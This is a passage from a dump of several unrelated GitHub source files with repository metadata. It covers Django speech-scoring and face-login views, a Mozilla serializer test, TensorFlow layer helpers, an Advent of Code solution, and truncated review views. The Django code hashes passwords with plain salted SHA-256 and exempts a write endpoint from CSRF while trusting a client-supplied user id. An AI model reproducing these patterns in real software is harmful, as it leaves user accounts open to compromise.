0.5,\r\n 'happy': 0.85, 'surprise': 0.85}\r\n audio_emotion = []\r\n for i in range(len(audio_emo)):\r\n if audio_emo[i][0] == 'neutral':\r\n audio_emotion.append(\r\n [audio_emo[i][0], audio_emotion_dict[audio_emo[i][0]] + (audio_emo[i][1] - 0.5) * 0.2])\r\n else:\r\n audio_emotion.append(\r\n [audio_emo[i][0], audio_emotion_dict[audio_emo[i][0]] + (audio_emo[i][1] - 0.5) * 0.15])\r\n\r\n # 发音可视化字符\r\n pro_viual = speech_table_value[0]['color_content']\r\n # 发音可视化字符串\r\n # 输出评价文字\r\n # 统计颜色个数\r\n # 定义三个正则表达式,分别用于匹配三种颜色\r\n red_pattern = re.compile(r'style=\"background-color: #dc6c64\">(.+?)')\r\n green_pattern = re.compile(r'style=\"background-color: #b7e1cd\">(.+?)')\r\n yellow_pattern = re.compile(r'style=\"background-color: #ffec8b\">(.+?)')\r\n # 使用正则表达式匹配字符串,并计算出现次数\r\n red_count = len(re.findall(red_pattern, pro_viual))\r\n green_count = len(re.findall(green_pattern, pro_viual))\r\n yellow_count = len(re.findall(yellow_pattern, pro_viual))\r\n # 统计评价标准\r\n # 音准反馈\r\n accurate_ratio = green_count / (green_count + red_count + yellow_count)\r\n # 肢体反馈/暂以total_score作为肢体评测反馈依据\r\n body_score = speech_table_value[0]['total_score']\r\n # 调型反馈\r\n tone_score = speech_table_value[0]['tone_score']\r\n # 韵律反馈\r\n phone_score = speech_table_value[0]['phone_score']\r\n # 流畅度反馈\r\n fluency_score = speech_table_value[0]['fluency_score']\r\n # 缀词反馈\r\n affix_score = speech_table_value[0]['affix_score']\r\n # 调用函数,获取反馈字符串\r\n feedback = generate_feedback(tone_score, phone_score, fluency_score,\r\n affix_score, body_score, accurate_ratio)\r\n\r\n # 是否有主题契合度评分\r\n topic_flag = 'false'\r\n if topic_score is not None:\r\n speech_table.append(topic_score)\r\n else:\r\n topic_flag = 'true'\r\n\r\n pose = list(models.Pose.objects.filter(uid=request.session.get('user_id'), date=date)\r\n .values('score', 'imgTime', 'pose', 'flag', 'emotion',\r\n 'limbsChanges', 'bodyDeviation', 'emotion_prob'\r\n ))\r\n pose_score = [i['score'] for i in pose]\r\n imgTime = [i['imgTime'] for i in pose]\r\n flag = [str(i['flag']) for i in pose]\r\n emotion = [i['emotion'] for i in pose]\r\n\r\n emotion_prob = [i['emotion_prob'] for i in pose]\r\n expression_emotion_dict = {'angry': 0.15, 'anger': 0.15, 'fear': 0.15, 'sad': 0.15, 'disgust': 0.15,\r\n 'neutral': 0.5,\r\n 'happy': 0.85, 'surprise': 0.85}\r\n expression_emotion = []\r\n for i in range(len(emotion)):\r\n if emotion[i] == 'neutral':\r\n expression_emotion.append(\r\n [emotion[i], expression_emotion_dict[emotion[i]] + (emotion_prob[i] - 0.5) * 0.2])\r\n else:\r\n expression_emotion.append(\r\n [emotion[i], expression_emotion_dict[emotion[i]] + (emotion_prob[i] - 0.5) * 0.15])\r\n\r\n dt = {'score': pose_score, 'imgTime': imgTime, 'emotion': emotion, 'flag': flag,\r\n 'expression_emotion': expression_emotion, 'text_emotion': text_emotion,\r\n 'audio_emotion': audio_emotion}\r\n\r\n limbs = sum([i['limbsChanges'] for i in pose])\r\n body = sum([i['bodyDeviation'] for i in pose])\r\n\r\n # pose 图片 flag 为 1 是否超过一定数量,没超过则全部显示\r\n count_flag = False\r\n if flag.count('True') > 10:\r\n count_flag = True\r\n pass\r\n # 返回\r\n return render(request, 'score/score.html',\r\n {'login_status': True, 'user_name': user_name,\r\n 'date': date.strftime('%Y-%m-%d %H:%M:%S'), 'data': dt, 'speech_score': speech_table,\r\n 'content': speech_table, 'pose': pose, 'count_flag': count_flag,\r\n 'topic_flag': topic_flag, 'dates': dates, 'limbs': limbs, 'body': body,\r\n 'pro_viual': pro_viual, 'feedback': feedback\r\n }) # pro_viual是音准可视化字符串,feedback是生成的反馈字符串\r\n else:\r\n return 
HttpResponse('该日期下并没有评测 !
')\r\n\r\n else:\r\n return redirect(\"/login/tip/您还未登录 !/\")\r\n\r\n\r\n# 展示 头像\r\n# def show_avatar(request):\r\n# if request.session.get('user_name'):\r\n# user = models.MyUser.objects.get(username=request.session.get('user_name'))\r\n# avatar = user.avatar\r\n# # user = models.Avatar.objects.filter(name='trent')[0]\r\n# # avatarName = str(user.avatar)\r\n# # avatarUrl = '%s/users/%s' % (settings.MEDIA_URL, avatarName) # 另一种写法\r\n# # if request.method == 'GET':\r\n# # users = models.MyUser.objects.all()\r\n# # return render(request, 'login/show.html', {'avatar': avatar})\r\n# return render(request, 'login/show.html', {'avatar': avatar, 'username': user.username})\r\n# # avatar = os.path.join(settings.MEDIA_URL, 'photos/demo.png')\r\n# # avatar_info = {'userName':str(image.user), 'avatarUrl': avatarUrl}\r\n# # return render(request, 'login/show.html', {'avatar':avatar})\r\n# else:\r\n# return redirect(\"/login/tip/您还未登录 !/\")\r\n\r\n\r\n# 上传头像\r\n# def upload_avatar(request):\r\n# if request.method == 'POST':\r\n# if request.session.get('user_name', None):\r\n# # image = models.MyUser(\r\n# # username = request.session.get('user_name'),\r\n# # avatar=request.FILES.get('avatar'),\r\n# # # face=request.FILES.get('face')\r\n# # )\r\n# user = models.MyUser.objects.get(username=request.session.get('user_name'))\r\n# dire = os.path.join(settings.MEDIA_ROOT, 'avatar')\r\n# img = request.FILES.get('avatar')\r\n# fileName = user.id + '.' + img.name.split('.')[-1]\r\n# filePath = os.path.join(dire, fileName).replace('\\\\', '/')\r\n# # user.avatar.delete()\r\n# if not os.path.isdir(dire):\r\n# os.mkdir(dire)\r\n# if os.path.exists(filePath):\r\n# os.remove(filePath)\r\n# with open(filePath, 'wb+') as f:\r\n# for chunk in img.chunks():\r\n# f.write(chunk)\r\n# user.avatar = 'avatar' + '/' + fileName\r\n# user.save()\r\n# # models.MyUser.objects.filter(id=user.id).update(avatar = 'avatar' + '/'+ fileName)\r\n# return HttpResponse('
' + request.session.get('user_name') + '
')\r\n# else:\r\n# # return redirect('/login')\r\n# return HttpResponse('
user_name为空!
')\r\n#\r\n# else:\r\n# return render(request, 'login/upload_image.html')\r\n\r\n\r\n# 用户信息\r\ndef user_info(request):\r\n if request.method == 'GET':\r\n if request.session.get('is_login', None):\r\n user = models.MyUser.objects.get(username=request.session.get('user_name'))\r\n return render(request, 'user/info.html', {'user': user, 'login_status': True, 'user_name': user.username})\r\n return redirect(\"/login/tip/您还未登录 !/\")\r\n\r\n # if request.method == 'POST':\r\n # # 获取当前登录用户才能修改信息\r\n # user = models.MyUser.objects.get(username=request.user.username)\r\n # data = request.POST\r\n # # print(request.FILES)\r\n # avatar = request.FILES.get('avatar')\r\n # # print(avatar)\r\n # username = data.get(\"username\")\r\n # email = data.get(\"email\")\r\n # phone = data.get('phone')\r\n # address = data.get('address')\r\n # cate = data.get('cate')\r\n # detail = data.get('detail')\r\n # # 判断用户修改信息时,有没有上传新图片\r\n # # 上传了换头像链接 否则不换\r\n # # 无该判断时,若用户未更换图片,则原图片链接会被赋空值,导致头像丢失\r\n # if avatar:\r\n # u.avatar = avatar\r\n # u.username = username\r\n # u.email = email\r\n # u.phone = phone\r\n # u.address = address\r\n # u.cate = cate\r\n # u.detail = detail\r\n # # 可能抛出异常:\r\n # # 如果该用户修改的昵称已存在数据库中,会报错\r\n # # 原因是,在我的设置里。用户名称是惟一的,不可重复的\r\n # # 因此,避免bug,且提供给用户弹窗警告\r\n # try:\r\n # # 如果未获取当前用户,save会新建一个没有密码的用户,操作是错误的\r\n # u.save()\r\n # except:\r\n # info = \"该用户名已被注册\"\r\n # return render(request,'Myapp/error.html', {'info':info})\r\n # # 和查看用户信息同理,每个用户都有自己的路由,修改后,重定向到新的路由\r\n # # 因为该路由由用户名决定\r\n # return HttpResponseRedirect('/profile/%s' % userinfo.username)\r\n # else:\r\n # return render(request, 'Myapp/profile_edit.html', {'userinfo':userinfo})\r\n\r\n\r\n# 求角度\r\ndef GetAngle(c1p1, c1p2, c2p1, c2p2):\r\n # 求出斜率\r\n if c1p2[0] == c1p1[0]:\r\n x = np.array([0, 1])\r\n else:\r\n k1 = (c1p2[1] - c1p1[1]) / (float(c1p2[0] - c1p1[0]))\r\n x = np.array([1, k1])\r\n if c2p2[0] == c2p1[0]:\r\n y = np.array([0, 1])\r\n else:\r\n k2 = (c2p2[1] - c2p1[1]) / (float(c2p2[0] - c2p1[0]))\r\n y = np.array([1, k2])\r\n # 模长\r\n Lx = np.sqrt(x.dot(x))\r\n Ly = np.sqrt(y.dot(y))\r\n # 根据向量之间求其夹角并保留固定小数位数\r\n Cobb = (np.arccos(x.dot(y) / (float(Lx * Ly))) * 180 / np.pi)\r\n return round(Cobb, 3)\r\n\r\n\r\n# 前后图片变化程度, True代表变化大, False代表变化小\r\n\r\ndef limbsChanges(sta, test):\r\n scope = 60\r\n flag_lst = [(11, 13), (13, 15), (12, 14), (14, 16), (24, 26), (26, 28), (23, 25), (25, 27)]\r\n for key in flag_lst:\r\n angle = GetAngle(sta[key[0]], sta[key[1]], test[key[0]], test[key[1]])\r\n # 四肢变化大 或者 人体偏移程度大\r\n if angle >= scope:\r\n return 1\r\n return 0\r\n\r\n\r\n# 计算前后图片 人体偏移程度\r\ndef bodyDeviation(sta, test):\r\n # mediapipe中坐标是已经归一化后的,可以直接进行计算\r\n sta2 = []\r\n test2 = []\r\n for i in range(0, 33):\r\n # 置信度大于0.99\r\n if sta[i][3] > 0.99 and test[i][3] > 0.99:\r\n sta2.append([sta[i][0], sta[i][1]])\r\n test2.append([test[i][0], test[i][1]])\r\n sta2 = np.array(sta2)\r\n test2 = np.array(test2)\r\n\r\n # 计算距离\r\n A = np.array([sta2[:, 0].mean(), sta2[:, 1].mean()])\r\n B = np.array([test2[:, 0].mean(), test2[:, 1].mean()])\r\n dist = np.sqrt(sum(np.power((A - B), 2)))\r\n\r\n # 距离范围\r\n if dist > 0.3:\r\n return 1\r\n return 0\r\n\r\n\r\n# 站姿正 得分\r\ndef poseScore(sta, test):\r\n scope = 20\r\n score = 0\r\n score_lst = [11, 12, 23, 24, 27, 28]\r\n for key in score_lst:\r\n angle = GetAngle(sta[key], sta[0], test[key], test[0])\r\n if abs(angle - scope) > scope:\r\n score += 0\r\n else:\r\n score += abs(angle - scope) / scope\r\n\r\n total_score = score / len(score_lst) * 100\r\n return round(total_score, 
2)\r\n\r\n\r\n# 上传 人脸图片\r\ndef face_upload(request):\r\n if request.session.get('is_login', None):\r\n if request.method == 'GET':\r\n user_name = request.session.get('user_name')\r\n return render(request, 'face/upload.html', {'login_status': True, 'user_name': user_name, 'page': 'upload'})\r\n\r\n if request.method == 'POST':\r\n user = models.MyUser.objects.get(username=request.session.get('user_name'))\r\n dirFace = os.path.join(settings.MEDIA_ROOT, 'face', user.id).replace('\\\\', '/')\r\n imgs = request.FILES.getlist('face')\r\n\r\n if os.path.isdir(dirFace):\r\n # 如果目标路径存在原文件夹的话就先删除\r\n shutil.rmtree(dirFace)\r\n\r\n os.makedirs(dirFace)\r\n\r\n for img in imgs:\r\n # 后缀名\r\n # fileName = str(uuid.uuid4()).replace('-', '') + '.' + img.name.split('.')[-1]\r\n file_name = str(uuid.uuid4()).replace('-', '') + '.png'\r\n filePath = os.path.join(dirFace, file_name).replace('\\\\', '/')\r\n with open(filePath, 'wb+') as f:\r\n for chunk in img.chunks():\r\n f.write(chunk)\r\n\r\n if os.path.exists('./media/face/representations_vgg_face.pkl'):\r\n os.remove('./media/face/representations_vgg_face.pkl')\r\n findDb.findDb(db_path='./media/face', enforce_detection=False, distance_metric='euclidean')\r\n\r\n ret = {'status': True}\r\n return JsonResponse(ret)\r\n\r\n else:\r\n return redirect(\"/login/tip/您还未登录 !/\")\r\n # return redirect('/login')\r\n\r\n\r\n# 人脸登录\r\ndef face_login(request):\r\n if request.session.get('is_login', None):\r\n return redirect(\"/index/tip/您已登录 !/\")\r\n\r\n else:\r\n if request.method == 'GET':\r\n return render(request, 'face/face_login.html', {'page': 'login'})\r\n\r\n if request.method == 'POST':\r\n dr = os.path.join(settings.MEDIA_ROOT, 'temp').replace('\\\\', '/')\r\n model_name = ['VGG-Face', 'Facenet', 'OpenFace', 'DeepFace', 'DeepID', 'Dlib', 'Ensemble']\r\n img = request.FILES.get('face')\r\n fileName = str(uuid.uuid4()).replace('-', '') + '.png'\r\n filePath = os.path.join(dr, fileName).replace('\\\\', '/')\r\n with open(filePath, 'wb+') as f:\r\n for chunk in img.chunks():\r\n f.write(chunk)\r\n df = DeepFace.find(img_path=filePath, model_name=model_name[0], db_path='./media/face',\r\n enforce_detection=False, distance_metric='euclidean')\r\n\r\n os.remove(filePath)\r\n\r\n if df.iloc[0]['VGG-Face_euclidean'] < 0.35:\r\n uid = df.iloc[0]['identity'].replace('\\\\', '/').split('/')[-2]\r\n if models.MyUser.objects.get(id=uid):\r\n user = models.MyUser.objects.get(id=uid)\r\n request.session['is_login'] = True\r\n request.session['user_id'] = user.id\r\n request.session['user_name'] = user.username\r\n request.session['status_flag'] = user.status_flag\r\n\r\n ret = {'state': True, 'user_name': str(user.username)}\r\n return JsonResponse(ret)\r\n\r\n else:\r\n ret = {'state': False}\r\n return JsonResponse(ret)\r\n\r\n else:\r\n ret = {'state': False}\r\n return JsonResponse(ret)\r\n\r\n\r\n# 登录 邮箱、用户名、密码、验证码\r\ndef login(request):\r\n if request.session.get('is_login', None):\r\n return redirect(\"/index/tip/您已登录/\")\r\n\r\n elif request.method == \"GET\":\r\n print(request.session.get('is_login'))\r\n register_form = RegisterForm()\r\n login_form = LoginForm()\r\n login_message = \"\"\r\n return render(request, 'login/login.html',\r\n {'login': True, 'login_form': login_form, 'register_form': register_form,\r\n 'login_message': login_message})\r\n\r\n elif request.method == \"POST\":\r\n register_form = RegisterForm()\r\n login_form = LoginForm(request.POST)\r\n login_message = \"表单验证失败\"\r\n if login_form.is_valid():\r\n username = 
login_form.cleaned_data['username']\r\n password = login_form.cleaned_data['password']\r\n flag = login_form.cleaned_data['flag']\r\n\r\n if models.MyUser.objects.filter(username=username).exists():\r\n user = models.MyUser.objects.get(username=username)\r\n\r\n if user.status_flag == flag:\r\n if user.password == hash_code(password):\r\n request.session['is_login'] = True\r\n request.session['user_id'] = user.id\r\n request.session['user_name'] = user.username\r\n request.session['status_flag'] = user.status_flag\r\n\r\n # 普通用户\r\n if user.status_flag == '0':\r\n return redirect(\"/index/\")\r\n # 裁判\r\n elif user.status_flag == '1':\r\n return redirect(\"/judge/video/\")\r\n # 管理员\r\n elif user.status_flag == '2':\r\n return redirect(\"/Administrator/secure/index\")\r\n # /Administrator/secure/index\r\n\r\n else:\r\n login_message = \"密码不正确\"\r\n else:\r\n login_message = \"请选择正确的用户身份\"\r\n else:\r\n login_message = \"用户不存在\"\r\n # return render(request, 'login/login.html', locals())\r\n return render(request, 'login/login.html',\r\n {'login': True, 'login_form': login_form, 'register_form': register_form,\r\n 'login_message': login_message})\r\n\r\n\r\n# 登录 提示\r\ndef login_tip(request, tip):\r\n if request.method == \"GET\":\r\n register_form = RegisterForm()\r\n login_form = LoginForm()\r\n return render(request, 'login/login.html',\r\n {'login': True, 'login_form': login_form, 'register_form': register_form,\r\n 'login_message': None, 'tip': tip})\r\n\r\n\r\n# 注册 邮箱、用户名、密码、验证码\r\ndef register(request):\r\n if request.session.get('is_login', None):\r\n return redirect(\"/index/tip/您已登录/\")\r\n\r\n elif request.method == \"GET\":\r\n register_form = RegisterForm()\r\n login_form = LoginForm()\r\n login_message = \"\"\r\n return render(request, 'login/login.html',\r\n {'login': False, 'login_form': login_form, 'register_form': register_form,\r\n 'login_message': login_message})\r\n\r\n elif request.method == \"POST\":\r\n login_form = LoginForm()\r\n register_form = RegisterForm(request.POST)\r\n register_message = \"表单验证失败\"\r\n if register_form.is_valid():\r\n email = register_form.cleaned_data['email']\r\n username = register_form.cleaned_data['username']\r\n password = register_form.cleaned_data['password']\r\n password2 = register_form.cleaned_data['password2']\r\n if password != password2:\r\n register_message = '两次密码不一样'\r\n return render(request, 'login/login.html',\r\n {'login': False, 'register_form': register_form, 'login_form': login_form,\r\n 'register_message': register_message})\r\n\r\n elif models.MyUser.objects.filter(email=email).exists():\r\n register_message = '邮箱已注册'\r\n return render(request, 'login/login.html',\r\n {'login': False, 'register_form': register_form, 'login_form': login_form,\r\n 'register_message': register_message})\r\n\r\n elif models.MyUser.objects.filter(username=username).exists():\r\n register_message = '用户名已注册'\r\n return render(request, 'login/login.html',\r\n {'login': False, 'register_form': register_form, 'login_form': login_form,\r\n 'register_message': register_message})\r\n else:\r\n user = models.MyUser.objects.create(username=username, email=email, password=hash_code(password))\r\n user.save()\r\n request.session['is_login'] = True\r\n request.session['user_id'] = user.id\r\n request.session['user_name'] = user.username\r\n # return redirect(\"/index\", login_status=True)\r\n return redirect(\"/index/\")\r\n # return render(request, \"index.html\", {'login_status': True, 'user_name': str(user.username)})\r\n\r\n return render(request, 
'login/login.html',\r\n {'login': False, 'register_form': register_form, 'login_form': login_form,\r\n 'register_message': register_message})\r\n\r\n\r\n# 注销\r\ndef logout(request):\r\n if not request.session.get('is_login', None):\r\n return redirect(\"/login/tip/您还未登录 !\")\r\n\r\n request.session.flush()\r\n return redirect(\"/login\")\r\n\r\n\r\n# 字符串+哈希\r\ndef hash_code(s, salt='speech_ai'): # 加点盐\r\n h = hashlib.sha256()\r\n s += salt\r\n h.update(s.encode()) # update方法只接收bytes类型\r\n return h.hexdigest()\r\n\r\n\r\n# 返回登录注册页面\r\ndef login_register(request):\r\n if request.session.get('is_login', None):\r\n return redirect(\"/index/tip/您已登录/\")\r\n\r\n elif request.method == \"GET\":\r\n login_form = LoginForm()\r\n register_form = RegisterForm()\r\n return render(request, 'login/login.html',\r\n {'login': True, 'login_form': login_form, 'register_form': register_form})\r\n\r\n\r\n# 返回 404 页面\r\ndef page_not_found(request, exception):\r\n return render(request, '404.html')\r\n\r\n# 500\r\n# def page_error(request, exception):\r\n# return render(request, '404.html')\r\n","repo_name":"1933211129/speech","sub_path":"speech_ai/login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":48892,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"17482800225","text":"from django.core.urlresolvers import reverse\nfrom django.test.client import RequestFactory\n\nfrom nose.tools import eq_, ok_\n\nfrom mkt.site.tests import app_factory, TestCase\nfrom mkt.versions.models import Version\nfrom mkt.versions.serializers import VersionSerializer\n\n\nclass TestVersionSerializer(TestCase):\n def setUp(self):\n self.app = app_factory()\n self.features = self.app.current_version.features\n self.request = RequestFactory().get('/')\n self.serializer = VersionSerializer(context={'request': self.request})\n\n def native(self, obj=None, **kwargs):\n if not obj:\n obj = self.app.current_version\n obj.update(**kwargs)\n return self.serializer.to_representation(obj)\n\n def test_renamed_fields(self):\n native = self.native()\n removed_keys = self.serializer.Meta.field_rename.keys()\n added_keys = self.serializer.Meta.field_rename.values()\n ok_(all(k not in native for k in removed_keys))\n ok_(all(k in native for k in added_keys))\n\n def test_addon(self):\n eq_(self.native()['app'], reverse('app-detail',\n kwargs={'pk': self.app.pk}))\n\n def test_is_current_version(self):\n old_version = Version.objects.create(addon=self.app, version='0.1')\n ok_(self.native()['is_current_version'])\n ok_(not self.native(obj=old_version)['is_current_version'])\n\n def test_features(self, **kwargs):\n if kwargs:\n self.features.update(**kwargs)\n native = self.native()\n for key in dir(self.features):\n if key.startswith('has_') and getattr(self.features, key):\n ok_(key.replace('has_', '') in native['features'])\n\n def test_features_updated(self):\n self.test_features(has_fm=True)\n","repo_name":"mozilla/zamboni","sub_path":"mkt/versions/tests/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":476,"dataset":"github-code","pt":"3"} +{"seq_id":"69959452882","text":"def add(a, b):\n return a + b\n\n\n\"\"\"\nMCNN layer defination using tensorflow\n\n1. conv: convolutional layer\n2. pool: pooling layer\n3. 
loss: loss layer to compute the mean square\n\"\"\"\n\n# import tensorflow and numpy\nimport tensorflow as tf\nimport numpy as np\n\n\ndef conv(input_tensor, name, kernel_size, n_output, stride=1, activation=tf.nn.relu):\n \"\"\"\n Convolutional layer:\n :param input_tensor: Input tensor (feature map/image)\n :param name: name of this convolutional layer\n :param kernel size: size of a square filter matrix\n :param n_out: number of output feature maps\n :param stride: stride value, default = 1\n :param activation_fn: nonlinear activation fucntion, default is relu\n :return: output feature map after activation\n \"\"\"\n\n n_in = input_tensor.get_shape()[-1].value\n with tf.variable_scope(name):\n weights = tf.Variable(\n tf.truncated_normal(\n shape=(kernel_size, kernel_size, n_in, n_output), stddev=0.01\n ),\n dtype=tf.float32,\n name=\"weights\",\n )\n biases = tf.Variable(\n tf.constant(0.0, shape=[n_output]), dtype=tf.float32, name=\"biases\"\n )\n conv = tf.nn.conv2d(\n input_tensor, weights, (1, stride, stride, 1), padding=\"SAME\"\n )\n activation = activation(tf.nn.bias_add(conv, biases))\n tf.summary.histogram(\"weights\", weights)\n return activation\n\n\ndef pool(input_tensor, name, kernel_size, stride):\n \"\"\"\n Max Pooling layer\n :param input_tensor: input tensor (feature map) to the pooling layer\n :param name: name of the layer\n :param kernel_size: scale down size \n :param stride: stride across size,\n :return: output tensor (feature map) with reduced feature size (Scaled down by 2).\n \"\"\"\n return tf.nn.max_pool(\n input_tensor,\n ksize=[1, kernel_size, kernel_size, 1],\n strides=[1, stride, stride, 1],\n padding=\"SAME\",\n name=name,\n )\n\n\ndef loss(estimate, grouth_truth):\n \"\"\"\n Computes mean square error between the network estimated density map and the ground truth density map.\n :param est: Estimated density map\n :param gt: Ground truth density map\n :return: scalar loss after doing pixel wise mean square error.\n \"\"\"\n return tf.losses.mean_squared_error(estimate, grouth_truth)\n\n\ndef test_loss_layer():\n if __name__ == \"__main__\":\n x = tf.placeholder(tf.float32, [1, 20, 20, 1])\n y = tf.placeholder(tf.float32, [1, 20, 20, 1])\n mse = loss(x, y)\n sess = tf.Session()\n dict = {\n x: 5 * np.ones(shape=(1, 20, 20, 1)),\n y: 1 * np.ones(shape=(1, 20, 20, 1)),\n }\n loss_value = sess.run(mse, feed_dict=dict)\n print('x size: {}'.format(x.shape))\n x = 5 * np.ones(shape=(20, 20))\n y = 1 * np.ones(shape=(20, 20))\n mae = abs(x-y)\n print(\"MSE: {:.2f}\".format(mae))\n print(\"sum x: {}, sum y: {}\".format(np.sum(x), np.sum(y)))\n sess.close()\n\ntest_loss_layer()\n","repo_name":"delvk/python_practice","sub_path":"src/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3120293133","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport logging\n\nfrom extractor.extractor_loader import ExtractorLoader\nfrom helper.hutils import import_class\n\nlogging.getLogger().setLevel(logging.INFO)\n\n\ndef main(settings):\n assert settings['feature_set'] is not None\n\n # Load feature set\n logging.info('loading feature set {}'.format(settings['feature_set']))\n extractor = ExtractorLoader()\n extractor.load(settings)\n\n # Load associated course\n extractor_settings = extractor.get_settings()\n logging.info('loading course data from {} {} {}'.format(extractor_settings['course_id'], 
extractor_settings['type'],\n extractor_settings['platform']))\n\n # Arrange data\n logging.info('arranging data from {}'.format(extractor_settings['course_id']))\n feature_labels = extractor.get_features_values()[0][settings['target']].values\n feature_values = extractor.get_features_values()[1]\n\n X = feature_values\n y = feature_labels if settings['target_type'] == 'regression' else feature_labels.astype(int)\n\n logging.info(X.shape)\n logging.info(y.shape)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Load features')\n\n parser.add_argument('--feature_set', dest='feature_set',\n default='eq_week-akpinar_et_al-toy_course_20210202_000840-20210202_134548', type=str,\n action='store') # Find the folder in data/result/test/feature\n parser.add_argument('--target', dest='target', default='label-pass-fail', type=str, action='store')\n parser.add_argument('--target_type', dest='target_type', default='classification', type=str, action='store')\n parser.add_argument('--classes', dest='classes', default=1, type=int, action='store')\n parser.add_argument('--workdir', dest='workdir', default='../data/result/test/', type=str, action='store')\n\n settings = vars(parser.parse_args())\n\n main(settings)\n","repo_name":"epfl-ml4ed/flipped-classroom","sub_path":"test/test_toy_extractor_loader.py","file_name":"test_toy_extractor_loader.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"14637659851","text":"from utils import *\nimport re\nimport copy\nfrom functools import *\nfrom collections import *\n\ndef main():\n # Load all lines\n lines = getlines()\n fields = {}\n i = 0\n while True:\n l = lines[i].split(':')\n k = l[0]\n if len(l) != 2:\n break\n v = l[1].strip().split(' or ')\n v = list(map(lambda x: x.split('-'), v))\n v = [ list(map(int, j)) for j in v ]\n fields[k] = v\n i += 1\n i += 2\n y_t = list(map(int, lines[i].split(',')))\n i += 3\n tikz = []\n newtikz = []\n while i < len(lines):\n l = lines[i]\n tikz.append(list(map(int, l.split(','))))\n i += 1\n ninvalid = 0\n for t in tikz:\n is_valid = True\n for q in t:\n valid = False\n for k, v in fields.items():\n for r in v:\n a = r[0]\n b = r[1]\n if a <= q <= b:\n valid = True\n if not valid:\n is_valid = False\n break\n if not is_valid:\n continue\n newtikz.append(t)\n possible = []\n for i in range(len(y_t)):\n c = set()\n for k in fields:\n c.add(k)\n possible.append(c)\n for t in newtikz:\n for i in range(len(t)):\n q = t[i]\n for k, v in fields.items():\n valid = False\n for r in v:\n a = r[0]\n b = r[1]\n if a <= q <= b:\n valid = True\n if not valid and k in possible[i]:\n possible[i].remove(k)\n\n while True:\n counts = defaultdict(int)\n for i in range(len(possible)):\n for k in possible[i]:\n counts[k] += 1\n for k, v in counts.items():\n if v == 1:\n for i in range(len(possible)):\n for k2 in list(possible[i]):\n if k2 != k and k in possible[i]:\n possible[i].remove(k2)\n can_end = True\n for k in possible:\n if len(k) != 1:\n can_end = False\n if can_end:\n break\n\n maps = {}\n for i in range(len(possible)):\n for k in possible[i]:\n maps[k] = i\n p(maps)\n t = 1\n for k, i in maps.items():\n if k.startswith('departure'):\n t *= y_t[i]\n p(t)\n\n \nif __name__ == '__main__':\n 
main()\n","repo_name":"stephen-hansen/Advent2020","sub_path":"16/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9831275542","text":"import datetime\nimport json\nfrom django.shortcuts import render, redirect\nfrom django.http import JsonResponse, HttpResponseRedirect, HttpResponse, HttpResponseNotFound\n\nfrom Homepage.models import Book\nfrom .models import Review\nfrom .forms import ReviewForm\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.decorators import user_passes_test\nfrom django.core import serializers\nfrom django.contrib.auth.decorators import login_required\nfrom Homepage.models import Book,ImageUrl\nfrom django.contrib.auth.models import User\n\n\n# Create your views here.\n\ndef home(request):\n return render(request, \"home.html\")\n\n@csrf_exempt\ndef get_review_json(request,id):\n book = Book.objects.get(id=id)\n reviews = Review.objects.prefetch_related('photo').select_related('user__auth_user').filter(book=book)\n review_list = []\n \n for review in reviews:\n print(photo.url for photo in review.photo.all())\n review_data = {\n 'user': review.user.auth_user.to_dict() if review.user else None,\n 'rating': review.rating,\n 'content': review.content,\n 'created_at':review.date_added,\n 'review':review.to_dict(),\n 'photos': [photo.url for photo in review.photo.all()]\n }\n review_list.append(review_data)\n\n return JsonResponse({'reviews': review_list})\n\n@login_required(login_url='/login/')\ndef show_review(request):\n form = ReviewForm(request.POST or None)\n if request.method == 'POST' and form.is_valid():\n create_review(request)\n return HttpResponseRedirect(reverse('ReviewApp:show_review'))\n bookId = 1\n print(\"==============KINGDOM BOOK==============\")\n print(bookId)\n reviews = Review.objects.all()\n context = {\n 'name' : request.user.username,\n 'reviews' : reviews,\n 'form': form,\n }\n return render(request, 'review.html', context)\n\n# def create_review(request):\n# if request.method == 'POST':\n# form = ReviewForm(request.POST or None)\n# if form.is_valid() and request.method == \"POST\":\n# review = form.save(commit=False)\n# review.user = request.user\n# review.save()\n# return HttpResponseRedirect(reverse('ReviewApp:show_review'))\n# else:\n# form = ReviewForm()\n# context = {'form': form }\n# return render(request, \"book_detail.html\", context)\n\n@csrf_exempt\ndef create_review(request):\n data = json.loads(request.body)\n user = User.objects.get(pk=int(data['userId'])) if data['userId'] else None\n print(user) \n print(data)\n print('konten->',data['content'])\n book = Book.objects.prefetch_related('authors', 'images', 'categories').get(pk=int(data['bookId']))\n print(book)\n if request.method == 'POST':\n try:\n print('sini lah susah bgt')\n new_comment = Review(user=user,rating=int(data['rating']),book=book,content=data['content'])\n print('kemari woi')\n new_comment.save()\n print(new_comment)\n print('nah okee')\n urls = []\n for url in data['photo']:\n photourl, created = ImageUrl.objects.get_or_create(url=url)\n urls.append(photourl)\n new_comment.photo.add(*urls)\n return JsonResponse({'status':201})\n except Exception as e:\n print(e)\n return JsonResponse({'status':500})\n \n return 
